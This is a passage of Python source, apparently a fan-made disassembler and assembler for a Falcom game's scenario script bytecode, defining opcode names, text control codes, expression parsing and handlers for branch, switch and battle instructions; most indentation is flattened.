InstructionNames[0x09] = 'SetMapFlags'
InstructionNames[0x0A] = 'ClearMapFlags'
InstructionNames[0x0B] = 'FadeToDark'
InstructionNames[0x0C] = 'FadeToBright'
InstructionNames[0x0D] = 'OP_0D'
InstructionNames[0x0E] = 'Fade'
InstructionNames[0x0F] = 'Battle'
InstructionNames[0x10] = 'OP_10'
InstructionNames[0x11] = 'OP_11'
InstructionNames[0x12] = 'StopSound'
InstructionNames[0x13] = 'OP_13'
InstructionNames[0x14] = 'BlurSwitch'
InstructionNames[0x15] = 'CancelBlur'
InstructionNames[0x16] = 'OP_16'
InstructionNames[0x17] = 'ShowSaveMenu'
InstructionNames[0x19] = 'EventBegin'
InstructionNames[0x1A] = 'EventEnd'
InstructionNames[0x1B] = 'OP_1B'
InstructionNames[0x1C] = 'OP_1C'
InstructionNames[0x1D] = 'SetBarrier'
InstructionNames[0x1E] = 'PlayBGM'
InstructionNames[0x1F] = 'OP_1F'
InstructionNames[0x20] = 'VolumeBGM'
InstructionNames[0x21] = 'OP_21'
InstructionNames[0x22] = 'WaitBGM'
InstructionNames[0x23] = 'Sound'
InstructionNames[0x24] = 'OP_24'
InstructionNames[0x25] = 'OP_25'
InstructionNames[0x26] = 'SoundDistance'
InstructionNames[0x27] = 'SoundLoad'
InstructionNames[0x28] = 'Yield'
InstructionNames[0x29] = 'OP_29'
InstructionNames[0x2A] = 'OP_2A'
InstructionNames[0x2B] = 'OP_2B'
InstructionNames[0x2C] = 'OP_2C'
InstructionNames[0x2D] = 'OP_2D'
InstructionNames[0x2E] = 'AddParty'
InstructionNames[0x2F] = 'RemoveParty'
InstructionNames[0x30] = 'ClearParty'
InstructionNames[0x31] = 'OP_31'
InstructionNames[0x32] = 'OP_32'
InstructionNames[0x35] = 'RemoveCraft'
InstructionNames[0x36] = 'AddCraft'
InstructionNames[0x37] = 'OP_37'
InstructionNames[0x38] = 'OP_38'
InstructionNames[0x39] = 'AddSepith'
InstructionNames[0x3A] = 'SubSepith'
InstructionNames[0x3B] = 'AddMira'
InstructionNames[0x3C] = 'SubMira'
InstructionNames[0x3D] = 'OP_3D'
InstructionNames[0x3E] = 'OP_3E'
InstructionNames[0x3F] = 'AddItemNumber'
InstructionNames[0x40] = 'SubItemNumber'
InstructionNames[0x41] = 'GetItemNumber'
InstructionNames[0x42] = 'OP_42'
InstructionNames[0x43] = 'GetPartyIndex'
InstructionNames[0x44] = 'BeginChrThread'
InstructionNames[0x45] = 'EndChrThread'
InstructionNames[0x46] = 'QueueWorkItem'
InstructionNames[0x47] = 'QueueWorkItem2'
InstructionNames[0x48] = 'WaitChrThread'
InstructionNames[0x49] = 'OP_49'
InstructionNames[0x4A] = 'Event'
InstructionNames[0x4B] = 'OP_4B'
InstructionNames[0x4C] = 'OP_4C'
InstructionNames[0x4D] = 'OP_4D'
InstructionNames[0x4E] = 'RunExpression'
InstructionNames[0x4F] = 'OP_4F'
InstructionNames[0x50] = 'OP_50'
InstructionNames[0x51] = 'OP_51'
InstructionNames[0x52] = 'OP_52'
InstructionNames[0x53] = 'TalkBegin'
InstructionNames[0x54] = 'TalkEnd'
InstructionNames[0x55] = 'AnonymousTalk'
InstructionNames[0x56] = 'OP_56'
InstructionNames[0x57] = 'OP_57'
InstructionNames[0x58] = 'MenuTitle'
InstructionNames[0x59] = 'CloseMessageWindow'
InstructionNames[0x5A] = 'OP_5A'
InstructionNames[0x5B] = 'SetMessageWindowPos'
InstructionNames[0x5C] = 'ChrTalk'
InstructionNames[0x5D] = 'NpcTalk'
InstructionNames[0x5E] = 'Menu'
InstructionNames[0x5F] = 'MenuEnd'
InstructionNames[0x60] = 'OP_60'
InstructionNames[0x61] = 'SetChrName'
InstructionNames[0x62] = 'OP_62'
InstructionNames[0x63] = 'OP_63'
InstructionNames[0x64] = 'OP_64'
InstructionNames[0x65] = 'OP_65'
InstructionNames[0x66] = 'OP_66'
InstructionNames[0x67] = 'OP_67'
InstructionNames[0x68] = 'OP_68'
InstructionNames[0x69] = 'OP_69'
InstructionNames[0x6A] = 'OP_6A'
InstructionNames[0x6B] = 'OP_6B'
InstructionNames[0x6C] = 'SetCameraDistance'
InstructionNames[0x6D] = 'MoveCamera'
InstructionNames[0x6E] = 'OP_6E'
InstructionNames[0x6F] = 'OP_6F'
InstructionNames[0x70] = 'OP_70'
InstructionNames[0x71] = 'OP_71'
InstructionNames[0x72] = 'SetMapObjFlags'
InstructionNames[0x73] = 'ClearMapObjFlags'
InstructionNames[0x74] = 'OP_74'
InstructionNames[0x75] = 'OP_75'
InstructionNames[0x76] = 'SetMapObjFrame'
InstructionNames[0x77] = 'OP_77'
InstructionNames[0x78] = 'OP_78'
InstructionNames[0x79] = 'OP_79'
InstructionNames[0x7A] = 'SetEventSkip'
InstructionNames[0x7B] = 'OP_7B'
InstructionNames[0x7D] = 'OP_7D'
InstructionNames[0x82] = 'OP_82'
InstructionNames[0x83] = 'SetChrChip'
InstructionNames[0x84] = 'OP_84'
InstructionNames[0x85] = 'LoadEffect'
InstructionNames[0x86] = 'PlayEffect'
InstructionNames[0x87] = 'OP_87'
InstructionNames[0x88] = 'StopEffect'
InstructionNames[0x89] = 'OP_89'
InstructionNames[0x8A] = 'OP_8A'
InstructionNames[0x8B] = 'OP_8B'
InstructionNames[0x8C] = 'SetChrChipByIndex'
InstructionNames[0x8D] = 'SetChrSubChip'
InstructionNames[0x8E] = 'OP_8E'
InstructionNames[0x8F] = 'SetChrPos'
InstructionNames[0x90] = 'OP_90'
InstructionNames[0x91] = 'TurnDirection'
InstructionNames[0x92] = 'OP_92'
InstructionNames[0x93] = 'OP_93'
InstructionNames[0x94] = 'OP_94'
InstructionNames[0x95] = 'OP_95'
InstructionNames[0x96] = 'OP_96'
InstructionNames[0x97] = 'OP_97'
InstructionNames[0x98] = 'OP_98'
InstructionNames[0x99] = 'OP_99'
InstructionNames[0x9A] = 'OP_9A'
InstructionNames[0x9B] = 'OP_9B'
InstructionNames[0x9C] = 'OP_9C'
InstructionNames[0x9D] = 'OP_9D'
InstructionNames[0x9E] = 'OP_9E'
InstructionNames[0x9F] = 'OP_9F'
InstructionNames[0xA0] = 'OP_A0'
InstructionNames[0xA1] = 'OP_A1'
InstructionNames[0xA2] = 'SetChrFlags'
InstructionNames[0xA3] = 'ClearChrFlags'
InstructionNames[0xA4] = 'SetChrBattleFlags'
InstructionNames[0xA5] = 'ClearChrBattleFlags'
InstructionNames[0xA6] = 'OP_A6'
InstructionNames[0xA7] = 'OP_A7'
InstructionNames[0xA8] = 'OP_A8'
InstructionNames[0xA9] = 'SetScenarioFlags'
InstructionNames[0xAA] = 'ClearScenarioFlags'
InstructionNames[0xAB] = 'OP_AB'
InstructionNames[0xAC] = 'OP_AC'
InstructionNames[0xAD] = 'OP_AD'
InstructionNames[0xAE] = 'OP_AE'
InstructionNames[0xAF] = 'OP_AF'
InstructionNames[0xB2] = 'OP_B2'
InstructionNames[0xB3] = 'OutputDebugInt'
InstructionNames[0xB4] = 'OP_B4'
InstructionNames[0xB5] = 'OP_B5'
InstructionNames[0xB6] = 'LoadOps'
InstructionNames[0xB7] = 'ModifyEventFlags'
InstructionNames[0xB8] = 'PlayMovie'
InstructionNames[0xB9] = 'OP_B9'
InstructionNames[0xBA] = 'ReplaceBGM'
InstructionNames[0xBC] = 'OP_BC'
InstructionNames[0xBD] = 'UseItem'
InstructionNames[0xBE] = 'OP_BE'
InstructionNames[0xBF] = 'OP_BF'
InstructionNames[0xC0] = 'SetChrChipPat'
InstructionNames[0xC2] = 'LoadChrChipPat'
InstructionNames[0xC3] = 'OP_C3'
InstructionNames[0xC4] = 'OP_C4'
InstructionNames[0xC5] = 'MiniGame'
InstructionNames[0xC7] = 'OP_C7'
InstructionNames[0xC9] = 'OP_C9'
InstructionNames[0xCA] = 'CreatePortrait'
InstructionNames[0xCB] = 'OP_CB'
InstructionNames[0xCC] = 'OP_CC'
InstructionNames[0xCD] = 'PlaceName2'
InstructionNames[0xCE] = 'PartySelect'
InstructionNames[0xCF] = 'OP_CF'
InstructionNames[0xD0] = 'MenuCmd'
InstructionNames[0xD1] = 'OP_D1'
InstructionNames[0xD2] = 'OP_D2'
InstructionNames[0xD3] = 'OP_D3'
InstructionNames[0xD4] = 'OP_D4'
InstructionNames[0xD5] = 'OP_D5'
InstructionNames[0xD6] = 'LoadChrToIndex'
InstructionNames[0xD7] = 'OP_D7'
InstructionNames[0xD8] = 'OP_D8'
InstructionNames[0xD9] = 'OP_D9'
InstructionNames[0xDA] = 'OP_DA'
InstructionNames[0xDC] = 'OP_DC'
InstructionNames[0xDD] = 'OP_DD'
InstructionNames[0xDE] = 'OP_DE'
InstructionNames[0xDF] = 'LoadAnimeChip'
InstructionNames[0xE0] = 'OP_E0'
InstructionNames[0xE2] = 'OP_E2'
InstructionNames[0xE3] = 'OP_E3'
InstructionNames[0xE4] = 'OP_E4'
InstructionNames[0xE5] = 'OP_E5'
InstructionNames[0xE6] = 'OP_E6'
InstructionNames[0xE7] = 'OP_E7'
InstructionNames[0xE8] = 'OP_E8'
InstructionNames[0xE9] = 'ShowSaveClearMenu'
InstructionNames[0xF0] = 'OP_F0'
InstructionNames[0xF3] = 'OP_F3'
InstructionNames[0xF4] = 'OP_F4'
InstructionNames[0xFA] = 'OP_FA'
InstructionNames[0xFB] = 'OP_FB'
InstructionNames[0xFC] = 'OP_FC'
InstructionNames[0xFD] = 'OP_FD'
InstructionNames[0xFE] = 'OP_FE'
InstructionNames[0xFF] = 'OP_FF'
for op, name in InstructionNames.items():
expr = '%s = 0x%08X' % (name, op)
exec(expr)
def GetItemName(id):
return ItemNameMap[id] if id in ItemNameMap else '0x%X' % id
def GetItemTrueName(id):
return '\'%s\'' % ItemTrueNameMap[id] if id in ItemTrueNameMap else '0x%X' % id
ScpStrCodeMap = {}
ScpStrCodeMap[-1] = 'SCPSTR_CODE_STRING'
ScpStrCodeMap[0x1F] = 'SCPSTR_CODE_ITEM'
ScpStrCodeMap[0x01] = 'SCPSTR_CODE_LINE_FEED'
ScpStrCodeMap[0x02] = 'SCPSTR_CODE_ENTER'
ScpStrCodeMap[0x03] = 'SCPSTR_CODE_CLEAR'
ScpStrCodeMap[0x05] = 'SCPSTR_CODE_05'
ScpStrCodeMap[0x07] = 'SCPSTR_CODE_COLOR'
ScpStrCodeMap[0x09] = 'SCPSTR_CODE_09'
for code, name in ScpStrCodeMap.items():
expr = '%s = %d' % (name, code)
exec(expr)
def GetStrCode(code):
return ScpStrCodeMap[code] if code in ScpStrCodeMap else '0x%X' % code
class ScpString:
def __init__(self, CtrlCode, Value = None):
self.CtrlCode = CtrlCode
self.Value = Value
def binary(self):
pass
def __str__(self):
if self.CtrlCode == SCPSTR_CODE_STRING:
return '"%s"' % self.Value
value = self.Value
code = GetStrCode(self.CtrlCode)
if value == None:
return 'scpstr(%s)' % code
value = GetItemTrueName(value) if self.CtrlCode == SCPSTR_CODE_ITEM else '0x%X' % value
return 'scpstr(%s, %s)' % (code, value)
def BuildStringListFromObjectList(strlist):
s = []
laststrindex = None
for x in strlist:
if x.CtrlCode == SCPSTR_CODE_LINE_FEED or \
x.CtrlCode == SCPSTR_CODE_ENTER or \
x.CtrlCode == SCPSTR_CODE_CLEAR or \
x.CtrlCode == SCPSTR_CODE_05 or \
x.CtrlCode == SCPSTR_CODE_COLOR or \
x.CtrlCode == SCPSTR_CODE_09:
if len(s) != laststrindex:
s.append(str(x))
else:
if x.CtrlCode == SCPSTR_CODE_COLOR:
tmp = '\\x%02X\\x%02X' % (x.CtrlCode, x.Value)
else:
tmp = '\\x%02X' % x.CtrlCode
s[-1] = '"%s%s"' % (s[-1][1:-1], tmp)
elif x.CtrlCode == SCPSTR_CODE_STRING:
s.append(str(x))
laststrindex = len(s)
else:
s.append(str(x))
return s
def FormatFuncString(data, oprfmt, mark_number = None):
entry = data.TableEntry
ins = data.Instruction
txt = [ '', '%s(' % entry.OpName ]
maxlen = 0
for i in range(len(oprfmt)):
opr = oprfmt[i]
if opr != 'S':
paramlist = BuildFormatOperandParameterList([opr], [ins.Operand[i]])
txt.append(' %s,' % entry.FormatAllOperand(paramlist))
#bp()
#txt.append(' 0x%X,' % ins.Operand[i])
else:
strlist = BuildStringListFromObjectList(ins.Operand[i])
if len(strlist) == 1:
s = ' %s' % strlist[0]
if i != len(oprfmt):
s += ','
txt.append(s)
continue
index = 0
txt.append(' (')
for s in strlist:
tmp = ' %s,' % s
if mark_number:
if strlen(tmp) > maxlen:
maxlen = strlen(tmp)
tmp = ljust_cn(tmp, mark_number)
tmp += ' # %d' % index
txt.append(tmp)
index += 1
txt.append(' )')
if mark_number == -1 and maxlen != 0:
return FormatFuncString(data, oprfmt, maxlen + 5)
txt.append(')')
txt.append('')
return txt
class EDAOScenaInstructionTableEntry(InstructionTableEntry):
def __init__(self, op, name = '', operand = NO_OPERAND, flags = 0, handler = None):
super().__init__(op, name, operand, flags, handler)
def WriteOperand(self, data, opr, value):
fs = data.FileStream
labels = data.Instruction.Labels
def wexpr(value):
for expr in value:
expr.WriteExpression(data)
def wstr(value, recursion = False):
if type(value) == str:
value = value.encode(CODE_PAGE)
if not recursion:
value += b'\x00'
elif IsTupleOrList(value):
for x in value:
wstr(x, True)
fs.wbyte(0)
return
fs.write(value)
oprtype = \
{
'E' : wexpr,
'S' : wstr,
'M' : lambda value : fs.wshort(BGMFileIndex(value).Index()),
'T' : lambda value : fs.wushort(ItemTrueNameMap[value] if type(value) == str else value),
}
return oprtype[opr](value) if opr in oprtype else super().WriteOperand(data, opr, value)
def FormatOperand(self, param):
value = param.Value
opr = param.Operand
flags = param.Flags
def formatstr(strlist):
s = BuildStringListFromObjectList(strlist)
if not flags.ArgNewLine:
if len(s) == 0:
return '""'
elif len(s) == 1:
return s[0]
return '(' + ', '.join(s) + ')'
raise Exception('not implement')
def formatbgm(bgm):
bgm = BGMFileIndex(bgm)
return ('"%s"' % bgm.Name()) if not bgm.IsInvalid() else ('0x%08X' % (bgm.Index() & 0xFFFFFFFF))
oprtype = \
{
'E' : lambda : FormatExpressionList(value),
'S' : lambda : formatstr(value),
'M' : lambda : BGMFileIndex(value).param(),
'T' : lambda : GetItemTrueName(value),
}
return oprtype[opr]() if opr in oprtype else super().FormatOperand(param)
def GetOperand(self, opr, fs):
def readstr():
string = []
tmpstr = ''
while True:
buf = fs.read(1)
if buf < b' ':
if tmpstr != '':
string.append(ScpString(SCPSTR_CODE_STRING, tmpstr.replace('\\', '\\\\')))
tmpstr = ''
code = struct.unpack('<B', buf)[0]
if code == 0:
break
strobj = ScpString(code)
if code == SCPSTR_CODE_COLOR:
# dummy byte ?
strobj.Value = fs.byte()
elif code == SCPSTR_CODE_LINE_FEED or code == 0x0A:
# line feed
pass
elif code == SCPSTR_CODE_ENTER:
# need press enter
pass
elif code == SCPSTR_CODE_CLEAR or code == 0x04:
# unknown
pass
elif code == 0x05:
pass
elif code == 0x06:
# unknown
pass
elif code == 0x18:
pass
elif code == SCPSTR_CODE_ITEM:
# item id
strobj.Value = fs.ushort()
string.append(strobj)
continue
elif buf >= b'\x80':
buf += fs.read(1)
tmpstr += buf.decode(self.Container.CodePage)
return string
oprtype = \
{
'S' : readstr,
'M' : lambda : fs.short(),
'T' : lambda : fs.ushort(),
}
return oprtype[opr]() if opr in oprtype else super().GetOperand(opr, fs)
def GetOperandSize(self, opr, fs):
if opr == 'M':
return 2
if opr != 'S':
return super().GetOperandSize(opr, fs)
pos = fs.tell()
self.GetOperand(opr, fs)
oprsize = fs.tell() - pos
fs.seek(pos)
return oprsize
def inst(op, operand = NO_OPERAND, flags = 0, handler = None):
return EDAOScenaInstructionTableEntry(op, InstructionNames[op], operand, flags, handler)
ExpressionOperantions = {}
ExpressionOperantions[0x00] = 'EXPR_PUSH_LONG'
ExpressionOperantions[0x01] = 'EXPR_END'
ExpressionOperantions[0x02] = 'EXPR_EQU'
ExpressionOperantions[0x03] = 'EXPR_NEQ'
ExpressionOperantions[0x04] = 'EXPR_LSS'
ExpressionOperantions[0x05] = 'EXPR_GTR'
ExpressionOperantions[0x06] = 'EXPR_LEQ'
ExpressionOperantions[0x07] = 'EXPR_GE'
ExpressionOperantions[0x08] = 'EXPR_EQUZ'
ExpressionOperantions[0x09] = 'EXPR_NEQUZ_I64'
ExpressionOperantions[0x0A] = 'EXPR_AND'
ExpressionOperantions[0x0B] = 'EXPR_OR'
ExpressionOperantions[0x0C] = 'EXPR_ADD'
ExpressionOperantions[0x0D] = 'EXPR_SUB'
ExpressionOperantions[0x0E] = 'EXPR_NEG'
ExpressionOperantions[0x0F] = 'EXPR_XOR'
ExpressionOperantions[0x10] = 'EXPR_IMUL'
ExpressionOperantions[0x11] = 'EXPR_IDIV'
ExpressionOperantions[0x12] = 'EXPR_IMOD'
ExpressionOperantions[0x13] = 'EXPR_STUB'
ExpressionOperantions[0x14] = 'EXPR_IMUL_SAVE'
ExpressionOperantions[0x15] = 'EXPR_IDIV_SAVE'
ExpressionOperantions[0x16] = 'EXPR_IMOD_SAVE'
ExpressionOperantions[0x17] = 'EXPR_ADD_SAVE'
ExpressionOperantions[0x18] = 'EXPR_SUB_SAVE'
ExpressionOperantions[0x19] = 'EXPR_AND_SAVE'
ExpressionOperantions[0x1A] = 'EXPR_XOR_SAVE'
ExpressionOperantions[0x1B] = 'EXPR_OR_SAVE'
ExpressionOperantions[0x1C] = 'EXPR_EXEC_OP'
ExpressionOperantions[0x1D] = 'EXPR_NOT'
ExpressionOperantions[0x1E] = 'EXPR_TEST_SCENA_FLAGS'
ExpressionOperantions[0x1F] = 'EXPR_GET_RESULT'
ExpressionOperantions[0x20] = 'EXPR_PUSH_VALUE_INDEX'
ExpressionOperantions[0x21] = 'EXPR_GET_CHR_WORK'
ExpressionOperantions[0x22] = 'EXPR_RAND'
ExpressionOperantions[0x23] = 'EXPR_23'
for opr, expr in ExpressionOperantions.items():
exec('EXPR_%02X = 0x%X' % (opr, opr))
exec('%s = 0x%X' % (expr, opr))
class ScpExpression:
def __init__(self, operation = None, operand = None):
self.Operation = operation
self.Operand = operand if operand != None else []
def binary(self):
return b''
def WriteExpression(self, handlerdata):
operation = self.Operation
fs = handlerdata.FileStream
def expr_exec():
handlerdata.Assemble(self.Operand[0])
operationmap = \
{
EXPR_PUSH_LONG : lambda : fs.wulong(self.Operand[0]),
EXPR_TEST_SCENA_FLAGS : lambda : fs.wushort(self.Operand[0]),
EXPR_GET_RESULT : lambda : fs.wushort(self.Operand[0]),
EXPR_PUSH_VALUE_INDEX : lambda : fs.wbyte(self.Operand[0]),
EXPR_23 : lambda : fs.wbyte(self.Operand[0]),
EXPR_GET_CHR_WORK : lambda : fs.write(struct.pack('<HB', *self.Operand)),
EXPR_EXEC_OP : lambda : handlerdata.Assemble(self.Operand[0]),
}
fs.wbyte(operation)
if operation in operationmap:
operationmap[operation]()
def __str__(self):
if self.Operation == EXPR_TEST_SCENA_FLAGS:
offset, bit = SplitScenarioFlags(self.Operand[0])
return 'scpexpr(%s, MakeScenarioFlags(0x%X, %d))' % (ExpressionOperantions[self.Operation], offset, bit)
elif self.Operation != EXPR_EXEC_OP:
txt = 'scpexpr(%s' % ExpressionOperantions[self.Operation]
for opr in self.Operand:
txt += ', 0x%X' % opr
txt += ')'
return txt
from Assembler import Assembler2
asm = Assembler2.Disassembler(edao_op_table)
txt = 'scpexpr(%s' % ExpressionOperantions[self.Operation]
for inst in self.Operand:
data = HandlerData(HANDLER_REASON_FORMAT)
data.Instruction = inst
data.TableEntry = edao_op_table[inst.OpCode]
txt += ', "%s"' % CombineMultiline(asm.FormatInstruction(data))
txt += ')'
return txt
def FormatExpressionList(exprlist):
exprtxt = '%s' % exprlist[0]
for expr in exprlist[1:]:
exprtxt += ', %s' % expr
return '(%s)' % exprtxt
def ParseScpExpression(data):
expr = []
fs = data.FileStream
# stack size == 0xB0 ?
while True:
operation = fs.byte()
scpexpr = ScpExpression(operation)
if operation == EXPR_PUSH_LONG:
scpexpr.Operand.append(fs.ulong())
elif operation == EXPR_END:
break
elif operation == EXPR_EQU or \
operation == EXPR_NEQ or \
operation == EXPR_LSS or \
operation == EXPR_GTR or \
operation == EXPR_LEQ or \
operation == EXPR_GE or \
operation == EXPR_EQUZ or \
operation == EXPR_NEQUZ_I64 or \
operation == EXPR_AND or \
operation == EXPR_OR or \
operation == EXPR_ADD or \
operation == EXPR_SUB or \
operation == EXPR_NEG or \
operation == EXPR_XOR or \
operation == EXPR_IMUL or \
operation == EXPR_IDIV or \
operation == EXPR_IMOD or \
operation == EXPR_STUB or \
operation == EXPR_IMUL_SAVE or \
operation == EXPR_IDIV_SAVE or \
operation == EXPR_IMOD_SAVE or \
operation == EXPR_ADD_SAVE or \
operation == EXPR_SUB_SAVE or \
operation == EXPR_AND_SAVE or \
operation == EXPR_XOR_SAVE or \
operation == EXPR_OR_SAVE or \
operation == EXPR_NOT:
# pop all operand, and push result
pass
elif operation == EXPR_EXEC_OP:
# execute one op code
execdata = data.CreateBranch()
#execdata.Instruction.OpCode = data.TableEntry.Container.GetOpCode(fs)
#execdata.TableEntry = data.TableEntry.Container[execdata.Instruction.OpCode]
execinst = execdata.Disasm(execdata)
scpexpr.Operand.append(execinst)
elif operation == EXPR_TEST_SCENA_FLAGS or \
operation == EXPR_GET_RESULT:
scpexpr.Operand.append(fs.ushort())
elif operation == EXPR_PUSH_VALUE_INDEX:
scpexpr.Operand.append(fs.byte())
elif operation == EXPR_GET_CHR_WORK:
scpexpr.Operand.append(fs.ushort())
scpexpr.Operand.append(fs.byte())
elif operation == EXPR_RAND:
pass
elif operation == EXPR_23:
scpexpr.Operand.append(fs.byte())
        expr.append(scpexpr)
return expr
def scp_if(data):
# if (expression)
# goto offset
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
expr = ParseScpExpression(data)
ins.Operand.append(expr)
offset = fs.ulong()
ins.Operand.append(offset)
ins.BranchTargets.append(offset)
ins.OperandFormat = 'EO'
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'EO'
return None
SWITCH_DEFAULT = -1
def scp_switch(data):
# switch (expression)
# case option_id:
# goto option_offset;
# default:
# goto default_offset
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
expr = ParseScpExpression(data)
optioncount = fs.byte()
options = []
for i in range(optioncount):
optionid, optionoffset = struct.unpack('<HL', fs.read(6))
options.append((optionid, optionoffset))
ins.BranchTargets.append(optionoffset)
defaultoffset = fs.ulong()
ins.BranchTargets.insert(0, defaultoffset)
ins.Operand.append(expr)
ins.Operand.append(options)
ins.Operand.append(defaultoffset)
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
# switch(
# Expression,
# (CaseID, CaseLabel),
# (CaseID, CaseLabel),
# (CaseID, CaseLabel),
# (-1, DefaultLabel)
# )
ins = data.Instruction
entry = data.TableEntry
txt = []
txt.append('%s(' % entry.OpName)
txt.append(' %s,' % FormatExpressionList(ins.Operand[0]))
GetLabelName = entry.Container.GetLabelName
#txt.append(' (')
for case in ins.Operand[1]:
txt.append(' (%d, "%s"),' % (case[0], GetLabelName(case[1])))
txt.append(' (SWITCH_DEFAULT, "%s"),' % GetLabelName(ins.Operand[-1]))
#txt.append(' )')
txt.append(')')
txt.append('')
return txt
elif data.Reason == HANDLER_REASON_ASSEMBLE:
fs = data.FileStream
args = data.Arguments
entry = data.TableEntry
inst = data.Instruction
exprlist = args[0]
optlist = args[1:]
opts = []
defaultoffset = None
for opt in optlist:
if opt[0] == SWITCH_DEFAULT:
if defaultoffset != None:
raise Exception('multi default case')
defaultoffset = opt[1]
else:
opts.append(opt)
optlist = opts
entry.Container.WriteOpCode(fs, inst.OpCode)
for expr in exprlist:
expr.WriteExpression(data)
entry.WriteOperand(data, 'B', len(optlist))
for opt in optlist:
fs.wushort(opt[0])
inst.Labels.append(LabelEntry(opt[1], fs.tell()))
fs.wulong(INVALID_OFFSET)
inst.Labels.append(LabelEntry(defaultoffset, fs.tell()))
fs.wulong(INVALID_OFFSET)
return inst
def scp_new_scene(data):
if data.Reason == HANDLER_REASON_DISASM:
data.Instruction.OperandFormat = 'LCCC'
elif data.Reason == HANDLER_REASON_FORMAT:
ins = data.Instruction
symbol = '%s("%s", %d, %d, %d)' % (
data.TableEntry.OpName, ScenarioFileIndex(ins.Operand[0]).Name(),
ins.Operand[1], ins.Operand[2], ins.Operand[3]
)
return [symbol]
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Arguments[0] = ScenarioFileIndex(data.Arguments[0]).Index()
data.Instruction.OperandFormat = 'LCCC'
def scp_battle(data):
operand_with_battle_info = 'OLBWWW'
operand_without_battle_info = 'LLS' + ('L' * 4) + ('L' * 8) + 'WW'
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
entry = data.TableEntry
BattleInfoOffset, opr2 = entry.GetAllOperand('LL', fs)
ins.Operand.append(BattleInfoOffset)
ins.Operand.append(opr2)
if BattleInfoOffset != 0xFFFFFFFF:
ins.Operand.append(fs.byte())
ins.Operand.append(fs.ushort())
ins.Operand.append(fs.ushort())
ins.Operand.append(fs.ushort())
ins.BranchTargets.append(BattleInfoOffset)
ins.OperandFormat = operand_with_battle_info
return ins
name = entry.GetOperand('S', fs)
ins.Operand.append(name)
for i in range(4):
ins.Operand.append(fs.ulong())
for i in range(8):
ins.Operand.append(fs.ulong())
ins.Operand += entry.GetAllOperand('WW', fs)
ins.OperandFormat = operand_without_battle_info
return ins
elif data.Reason == HANDLER_REASON_FORMAT:
ins = data.Instruction
entry = data.TableEntry
BattleInfoOffset = ins.Operand[0]
if BattleInfoOffset == 0xFFFFFFFF:
return
p = '%s("BattleInfo_%X", ' % (entry.OpName, BattleInfoOffset)
paramlist = BuildFormatOperandParameterList(
ins.OperandFormat[1:],
ins.Operand[1:],
ins.Flags,
data.LabelMap
)
return [p + entry.FormatAllOperand(paramlist) + ')']
elif data.Reason == HANDLER_REASON_ASSEMBLE:
ins = data.Instruction
BattleInfoOffset = data.Arguments[0]
ins.OperandFormat = operand_with_battle_info if type(BattleInfoOffset) == str else operand_without_battle_info
# SetBarrier(op_0, id, type, 0, x, z, y, cx, cy, degree * 1000)
# op: 0 = create
# type: 1 = line, 2 = circle
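# Illustrative call (hypothetical values, not taken from any actual scenario script),
# following the operand layout described above:
#   SetBarrier(0x00, 0x01, 0x02, 0, 10000, 0, 20000, 1500, 1500, 90 * 1000)
# i.e. create (op = 0) a circular barrier (type = 2) at position (x, z, y) with
# extents (cx, cy) and an angle parameter of 90 degrees scaled by 1000.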
def scp_1d(data):
def getopr(opr1):
operand = ''
if opr1 == 0:
operand = 'BBiiiiii'
elif opr1 == 2 or opr1 == 3:
operand = 'B'
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
opr1, opr2 = data.TableEntry.GetAllOperand('BB', fs)
ins.Operand.append(opr1)
ins.Operand.append(opr2)
operand = getopr(opr1)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'BB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
opr1 = data.Arguments[0]
operand = getopr(opr1)
data.Instruction.OperandFormat = 'BB' + operand
def scp_29(data):
def getopr(opr2):
operand = ''
if opr2 == 1 or opr2 == 2:
operand = 'W'
elif opr2 == 3 or opr2 == 4:
operand = 'B'
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
opr1, opr2 = data.TableEntry.GetAllOperand('WB', fs)
ins.Operand.append(opr1)
ins.Operand.append(opr2)
operand = getopr(opr2)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'WB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'WB' + getopr(data.Arguments[1])
def scp_2a(data):
def getopr(opr2): return 'W' if opr2 == 1 else 'B'
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
opr1, opr2 = data.TableEntry.GetAllOperand('WB', fs)
ins.Operand.append(opr1)
ins.Operand.append(opr2)
operand = getopr(opr2)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'WB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
opr2 = data.Arguments[1]
data.Instruction.OperandFormat = 'WB' + getopr(opr2)
def scp_2b(data):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
for i in range(0xC):
opr = fs.ushort()
ins.Operand.append(opr)
if opr == 0xFFFF:
break
ins.OperandFormat = 'W' * len(ins.Operand)
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'W' * min(0xC, len(data.Arguments))
def scp_38(data):
def getopr(opr2):
operand = ''
if opr2 == 0x7F:
operand = 'B'
elif opr2 >= 0x80 and opr2 <= 0x87:
operand = 'B'
return operand
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
opr1, opr2 = data.TableEntry.GetAllOperand('BB', fs)
ins.Operand.append(opr1)
ins.Operand.append(opr2)
operand = getopr(opr2)
ins.Operand += data.TableEntry.GetAllOperand(operand, fs)
ins.OperandFormat = 'BB' + operand
return ins
elif data.Reason == HANDLER_REASON_ASSEMBLE:
data.Instruction.OperandFormat = 'BB' + getopr(data.Arguments[1])
def scp_lambda_worker(data, extra_length):
if data.Reason == HANDLER_REASON_DISASM:
fs = data.FileStream
ins = data.Instruction
target, tid, length = data.TableEntry.GetAllOperand('WBB', fs)
length += extra_length
pos = fs.tell()
block = data.DisasmBlock(pos, length)
